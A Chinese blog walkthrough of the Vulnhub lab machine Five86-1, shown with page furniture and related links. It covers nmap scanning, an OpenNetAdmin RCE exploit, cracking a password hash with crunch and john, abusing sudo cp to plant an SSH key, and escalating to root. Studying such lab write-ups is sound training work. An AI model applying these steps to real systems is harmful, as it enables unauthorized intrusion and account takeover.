【Vulnhub】Five86-1

最新推荐文章于 2024-01-26 21:55:07 发布
最新推荐文章于 2024-01-26 21:55:07 发布
阅读量601 收藏
点赞数 1
分类专栏: vulnhub 文章标签: five86-1 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xia739635297/article/details/104235362
版权

Description

The ultimate goal of this challenge is to get root and to read the one and only flag.

信息搜集

nmap -sP 192.168.1.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:02 CST
Nmap scan report for 192.168.1.1
Host is up (0.0021s latency).
MAC Address: C4:F0:EC:7F:52:EC (Fiberhome Telecommunication Technologies)
Nmap scan report for 192.168.1.2
Host is up (0.091s latency).
MAC Address: 20:34:FB:CF:B4:38 (Xiaomi Communications)
Nmap scan report for 192.168.1.4
Host is up (0.074s latency).
MAC Address: 74:23:44:8D:74:79 (Xiaomi Communications)
Nmap scan report for 192.168.1.7
Host is up (0.00032s latency).
MAC Address: B0:35:9F:56:8C:A9 (Intel Corporate)
Nmap scan report for 192.168.1.8
Host is up (0.38s latency).
MAC Address: 34:CE:00:A5:BC:2D (Xiaomi Electronics,co.)
Nmap scan report for 192.168.1.14
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 132.91 seconds

确定目标为192.168.1.7

探测目标端口开放

nmap -sS -p1-65535 192.168.1.7

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:03 CST
Nmap scan report for 192.168.1.7
Host is up (0.00054s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
10000/tcp open  snet-sensor-mgmt
MAC Address: B0:35:9F:56:8C:A9 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds

发现80端口开放,先访问80端口服务

url:http://192.168.1.7

打开后是一个白页,尝试访问robots.txt文件,发现/ona

寻找漏洞

先在exploit-db搜一下有没有OPenNetAdminv18.1.1的相关漏洞和exp

获得shell

把第二个exp下载下来,试着利用.

可以用.emmmm,这次获得shell是相当快了,这就是rce漏洞的威力了...

提权

查看www-data用户能访问哪些文件

find / -type f -user www-data

/var/www/html/reports/.htaccess
/var/log/ona.log
/proc/1454/task/1454/fdinfo/0
/proc/1454/task/1454/fdinfo/1
/proc/1454/task/1454/fdinfo/2
/proc/1454/task/1454/fdinfo/12
/proc/1454/task/1454/environ
/proc/1454/task/1454/auxv
/proc/1454/task/1454/status
/proc/1454/task/1454/personality
/proc/1454/task/1454/limits
/proc/1454/task/1454/sched
/proc/1454/task/1454/comm
/proc/1454/task/1454/syscall
/proc/1454/task/1454/cmdline
/proc/1454/task/1454/stat
/proc/1454/task/1454/statm
/proc/1454/task/1454/maps
/proc/1454/task/1454/children
/proc/1454/task/1454/numa_maps
/proc/1454/task/1454/mem
/proc/1454/task/1454/mounts
/proc/1454/task/1454/mountinfo
/proc/1454/task/1454/clear_refs
/proc/1454/task/1454/smaps
/proc/1454/task/1454/smaps_rollup
/proc/1454/task/1454/pagemap
/proc/1454/task/1454/attr/current
/proc/1454/task/1454/attr/prev
/proc/1454/task/1454/attr/exec
/proc/1454/task/1454/attr/fscreate
/proc/1454/task/1454/attr/keycreate
/proc/1454/task/1454/attr/sockcreate
/proc/1454/task/1454/wchan
/proc/1454/task/1454/stack
/proc/1454/task/1454/schedstat
/proc/1454/task/1454/cpuset
/proc/1454/task/1454/cgroup
/proc/1454/task/1454/oom_score
/proc/1454/task/1454/oom_adj
/proc/1454/task/1454/oom_score_adj
/proc/1454/task/1454/loginuid
/proc/1454/task/1454/sessionid
/proc/1454/task/1454/io
/proc/1454/task/1454/uid_map
/proc/1454/task/1454/gid_map
/proc/1454/task/1454/projid_map
/proc/1454/task/1454/setgroups
/proc/1454/task/1454/patch_state
/proc/1454/fdinfo/0
/proc/1454/fdinfo/1
/proc/1454/fdinfo/2
/proc/1454/fdinfo/12
/proc/1454/environ
/proc/1454/auxv
/proc/1454/status
/proc/1454/personality
/proc/1454/limits
/proc/1454/sched
/proc/1454/autogroup
/proc/1454/comm
/proc/1454/syscall
/proc/1454/cmdline
/proc/1454/stat
/proc/1454/statm
/proc/1454/maps
/proc/1454/numa_maps
/proc/1454/mem
/proc/1454/mounts
/proc/1454/mountinfo
/proc/1454/mountstats
/proc/1454/clear_refs
/proc/1454/smaps
/proc/1454/smaps_rollup
/proc/1454/pagemap
/proc/1454/attr/current
/proc/1454/attr/prev
/proc/1454/attr/exec
/proc/1454/attr/fscreate
/proc/1454/attr/keycreate
/proc/1454/attr/sockcreate
/proc/1454/wchan
/proc/1454/stack
/proc/1454/schedstat
/proc/1454/cpuset
/proc/1454/cgroup
/proc/1454/oom_score
/proc/1454/oom_adj
/proc/1454/oom_score_adj
/proc/1454/loginuid
/proc/1454/sessionid
/proc/1454/coredump_filter
/proc/1454/io
/proc/1454/uid_map
/proc/1454/gid_map
/proc/1454/projid_map
/proc/1454/setgroups
/proc/1454/timers
/proc/1454/timerslack_ns
/proc/1454/patch_state
/proc/1456/task/1456/fdinfo/0
/proc/1456/task/1456/fdinfo/1
/proc/1456/task/1456/fdinfo/2
/proc/1456/task/1456/fdinfo/3
/proc/1456/task/1456/fdinfo/4
/proc/1456/task/1456/fdinfo/5
/proc/1456/task/1456/fdinfo/7
/proc/1456/task/1456/fdinfo/8
/proc/1456/task/1456/fdinfo/9
/proc/1456/task/1456/fdinfo/10
/proc/1456/task/1456/fdinfo/12
/proc/1456/task/1456/environ
/proc/1456/task/1456/auxv
/proc/1456/task/1456/status
/proc/1456/task/1456/personality
/proc/1456/task/1456/limits
/proc/1456/task/1456/sched
/proc/1456/task/1456/comm
/proc/1456/task/1456/syscall
/proc/1456/task/1456/cmdline
/proc/1456/task/1456/stat
/proc/1456/task/1456/statm
/proc/1456/task/1456/maps
/proc/1456/task/1456/children
/proc/1456/task/1456/numa_maps
/proc/1456/task/1456/mem
/proc/1456/task/1456/mounts
/proc/1456/task/1456/mountinfo
/proc/1456/task/1456/clear_refs
/proc/1456/task/1456/smaps
/proc/1456/task/1456/smaps_rollup
/proc/1456/task/1456/pagemap
/proc/1456/task/1456/attr/current
/proc/1456/task/1456/attr/prev
/proc/1456/task/1456/attr/exec
/proc/1456/task/1456/attr/fscreate
/proc/1456/task/1456/attr/keycreate
/proc/1456/task/1456/attr/sockcreate
/proc/1456/task/1456/wchan
/proc/1456/task/1456/stack
/proc/1456/task/1456/schedstat
/proc/1456/task/1456/cpuset
/proc/1456/task/1456/cgroup
/proc/1456/task/1456/oom_score
/proc/1456/task/1456/oom_adj
/proc/1456/task/1456/oom_score_adj
/proc/1456/task/1456/loginuid
/proc/1456/task/1456/sessionid
/proc/1456/task/1456/io
/proc/1456/task/1456/uid_map
/proc/1456/task/1456/gid_map
/proc/1456/task/1456/projid_map
/proc/1456/task/1456/setgroups
/proc/1456/task/1456/patch_state
/proc/1456/fdinfo/0
/proc/1456/fdinfo/1
/proc/1456/fdinfo/2
/proc/1456/fdinfo/3
/proc/1456/fdinfo/4
/proc/1456/fdinfo/6
/proc/1456/fdinfo/7
/proc/1456/fdinfo/12
/proc/1456/environ
/proc/1456/auxv
/proc/1456/status
/proc/1456/personality
/proc/1456/limits
/proc/1456/sched
/proc/1456/autogroup
/proc/1456/comm
/proc/1456/syscall
/proc/1456/cmdline
/proc/1456/stat
/proc/1456/statm
/proc/1456/maps
/proc/1456/numa_maps
/proc/1456/mem
/proc/1456/mounts
/proc/1456/mountinfo
/proc/1456/mountstats
/proc/1456/clear_refs
/proc/1456/smaps
/proc/1456/smaps_rollup
/proc/1456/pagemap
/proc/1456/attr/current
/proc/1456/attr/prev
/proc/1456/attr/exec
/proc/1456/attr/fscreate
/proc/1456/attr/keycreate
/proc/1456/attr/sockcreate
/proc/1456/wchan
/proc/1456/stack
/proc/1456/schedstat
/proc/1456/cpuset
/proc/1456/cgroup
/proc/1456/oom_score
/proc/1456/oom_adj
/proc/1456/oom_score_adj
/proc/1456/loginuid
/proc/1456/sessionid
/proc/1456/coredump_filter
/proc/1456/io
/proc/1456/uid_map
/proc/1456/gid_map
/proc/1456/projid_map
/proc/1456/setgroups
/proc/1456/timers
/proc/1456/timerslack_ns
/proc/1456/patch_state

发现/var/www/html/reports/.htaccess,查看一下内容

发现了douglas用户的密码hash,以及密码长度和密码字符集,众所周知john可以结合passwd与shadow文件破解linux密码.

使用crunch生成密码字典

crunch 10 10 aefhrt > pwd.txt   #这里涉及的crunch用法是:crunch min max charsets > outputfile

 使用unshadow生成含有用户信息和密码hash的文件

dpasswd的内容由/etc/passwd得到.

下面使用john破解密码

john --wordlist=pwd.txt hashfile

john不会破解已经破解过的hash,所以会返回这个.但是可以用john --show hashfile来查看已经破解过的.

即用户名:密码=douglas:fatherrrrr

 而后便又是搜集信息,在sudo -l中有发现

 dougals用户可以以jen的身份使用sudo执行/bin/cp,并且不需要jen用户密码.

看到这里大概可以猜到,要提权到root还得先到jen.所以我们可以利用cp命令将我们的ssh公钥添加到jen用户目录下

简单说明一下为何在/tmp目录下进行这些操作.

出题者给用户权限给得很死,非root用户是无法对其他用户目录进行操作的(这才是正确操作),我找了找,发现只有/tmp目录下可以写东西.

当然,douglas用户自己的目录下也可以写东西,但是写了之后是无法使用sudo -u jen cp将东西拷贝到/home/jen里的.因为这条命令是以jen的身份执行的,而jen是没有权限访问douglas目录下文件的.

公钥放置完毕,使用ssh进行jen用户登录.

同样,我还是首先查看jen用户可以访问哪些东西.

find / -type f -user jen 2>/dev/null

发现jen用户的邮件(其实登录成功的时候有提示,最后一句话:You have new mail,不过我没看见)

查看邮件内容

发现moss用户的密码Fire!Fire!

切换成moss用户

su moss

moss下有个隐藏目录.games,里面很多很多游戏,我都大概看了一下,然后可以发现upyourgame很不同

运行upyourgame,随便输内容,成功获得root权限

 为了方便后续访问的话,我会选择添加ssh公钥在root用户下

对了,10000端口的服务是webmin,emmmm不过没用到.

丶4ut15m
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Five75-开源
07-09
“Five75”是为Haiku 操作系统开发各种“必不可少”的第三方软件的项目,包括IDE、Sisong 和图像编辑器Ophyrus。 所有程序都是并且将是 GPL 下的免费软件。
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
vulnhub靶场之Five86-1
最新发布
qq_58091216的博客
01-26 832
由于这些文章都是从我的hexo博客上面复制下来的,所以有的图片可能不是很完整,但是不受影响,如果有疑问,可以在评论区留言,我看到之后会回复。
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub渗透靶机系列----DC4
m0_67284865的博客
08-18 90
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC4
收藏ASCLL码表
weixin_33725126的博客
09-02 210
2019独角兽企业重金招聘Python工程师标准>>> ...
渗透Five86-1
Ays.Ie的博客
03-02 178
本篇文章为five86的第1个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
five86-1靶机
薛定谔嘚喵博客
04-04 150
OpenNetAdmin 提供了一个数据库管理库存的IP网络.每个主机可以跟踪通过一个集中的AJAX的web界 面,可以帮助减少跟踪误差,并为您提供的一个工具.该项目OpenNetAdmin希望能提供一个有用的网络管理应用程序,用于管理您的IP子网和主机. 停止使用的电子表格来管理您的网络!查看moss家目录,发现了一个隐藏目录为.games,查看.games看到upyourgame的所属者和所属组有点意思,全是root,并且可执行。发现可以用jen用户的身份执行/bin/cp,且无密码。
TryHackMe-进攻性渗透测试-19_缓冲区溢出_Brainpan
M1n9K1n9的博客
12-28 523
rainpan非常适合OSCP练习,强烈建议在考试前完成。通过分析 Linux 计算机上可切割的 Windows exe 来利用缓冲区溢出漏洞。如果你被困在这台机器上,不要放弃(或看写),只要更加努力。这是一个定位难度:难 的房间,不过经过前面的缓冲区溢出练习,相信也不会有什么大问题循例,nmap扫nc都连一下,10000端口是web服务,9999不知道是什么东西,不过按照以往经验,这玩意铁定存在栈溢出漏洞既然开了web,我们循例也扫一下目录,因为主页就一张图片啥也没了。
vulnhub靶机Five86-1渗透笔记
liver100day的博客
09-07 1231
文章目录1.环境搭建2.主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sick0s1.1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 2.主机发现 3.漏洞利用 4.提权 5.总结 ...
Five Stone-开源
04-26
这五个游戏是JAVA Client / Server模式的一个应用程序,该程序使用JAVA swing,socket和多线程技术,并使用hsql作为其数据库。
Vulnhub靶场实战———DC5
m0_67309561的博客
05-07 115
我们每次提交时,下面数字都会发现改变,我们猜测并不是一个静态数据,存在文件包含,我们测试一下。PS:此关和前面DC4一样,都是只有一个FLAG并且是通过提权的方式来获取FLAG。果然存在数据,但是这个站点不存在文件上传功能,所以尝试包含日志文件写shell。查看该用户有什么root权限命令,我们发现了一个screen的东西。已经存在了两个文件,接下来我们将其上传至靶机 tmp目录。我们发现了两个exp, 我们在kali本地编译得到。上传完成,接下来就到了最后的提取操作了。发现80端口开启,我们进入看一下。
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 3879
dc-4靶场详细渗透过程
靶机渗透-Vulnhub-DC-4
dahege666的博客
02-05 242
下载地址: 1、链接:https://pan.baidu.com/s/1UldJRqM1zJTwq9YoAxwd4Q 提取码:e9o1 2、http://www.five86.com/downloads/DC-4.zip 3、https://download.vulnhub.com/dc/DC-4.zip 靶机:DC4(VMware桥接) IP:192.168.88.124 攻击机:Kali(VMware桥接) IP:192.168..88.109 先用nmap对目标主机进行...
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4299
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1134
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
Five86-2靶机渗透记录
Jach1n
01-31 200
Five86-2靶机渗透记录
Five-fold cross-validation
08-29
Five-fold cross-validation是一种验证方法,在模型选择时用来评估不同模型的性能。它将数据集分成五个相等大小的子集,然后轮流将其中四个子集作为训练集,剩下一个子集作为验证集。这个过程重复五次,每次选择不同的验证集。最后,将五次的验证结果取平均值作为模型的评估指标。这种方法可以帮助我们选择在特定数据集上表现最好的模型。通过比较不同模型的平均结果,我们可以选择出最优的模型。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [机器学习_K折交叉验证知识详解(深刻理解版)(全网最详细)](https://blog.csdn.net/Rocky6688/article/details/107296546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值